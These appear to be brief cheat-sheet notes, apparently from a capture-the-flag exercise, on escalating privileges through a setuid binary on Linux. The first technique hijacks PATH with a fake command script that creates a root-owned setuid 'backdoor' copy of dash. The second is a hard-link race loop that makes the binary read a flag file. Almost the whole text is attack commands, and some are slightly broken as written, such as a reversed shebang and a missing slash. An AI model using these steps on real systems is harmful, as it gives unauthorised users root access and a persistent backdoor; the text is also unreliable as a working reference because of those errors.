Run ltrace (if installed) on the binary and see if it calls a system command with no path defined

To add current

directory to path

export PATH=.:$PATH

#Create a script named the same as a system command the setuid binary uses, e.g., grep

#Script contents

!#/bin/dash - dash keeps setuid permissions.

#Whatever command you want to run, e.g.:

cp /bin/dash backdoor

Chown root:root backdoor

Chmod u+s backdoor

#Chmod 755 scriptname

#Run setuid binary

Run in a directory in which the current user can write. SUID binary is at /path/binary

Cp /bin/cat 'asdf (deleted)'

While true; do ln /path/binary ./asdf; (.asdf ../poetry/flag &);rm asdf; done

Works because of race condition. The while loop runs and backgrounds the binary and then deletes it. The hard link then switches to the name of the binary plus (deleted) and the second time through the while loop runs that.